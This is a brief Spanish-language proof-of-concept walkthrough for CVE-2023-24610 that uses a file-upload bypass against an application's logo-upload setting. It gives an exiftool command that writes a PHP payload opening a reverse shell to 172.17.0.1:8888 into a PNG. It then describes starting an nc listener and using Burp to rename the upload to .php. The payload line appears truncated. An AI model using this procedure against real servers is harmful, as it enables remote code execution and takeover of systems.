
Esto es una prueba de concepto para CVE-2023-24610
Esto es una prueba de concepto para CVE-2023-24610
Comenzamos creando un archivo políglota usando exiftool: exiftool -Comment="/dev/tcp/172.17.0.1/8888 <&1\''); ?>" avatar.png -o polyglot.php

Cambiamos el archivo a png para que pase la verificación del front-end

Después, iniciamos un listener de nc en el puerto 8888 para recibir la shell.

El siguiente paso es iniciar sesión en la aplicación y hacer clic en configuración

En la parte inferior de la página, vemos un área de logo de práctica. Podemos subir un archivo usando el botón de editar en el lado derecho

Hacemos clic en editar y luego en examinar, seleccionamos el archivo “.png” que creamos en el primer paso

Antes de hacer clic en subir, nos aseguramos de interceptar la solicitud con Burp o algo similar. Hacemos clic en subir y en Burp cambiamos la extensión del archivo de “png” a “php”

Desactivamos la interceptación para que nuestro archivo se suba y revisamos el listener de nc que iniciamos antes. Tenemos una shell reversa y la IP apunta a nuestro contenedor de Docker.
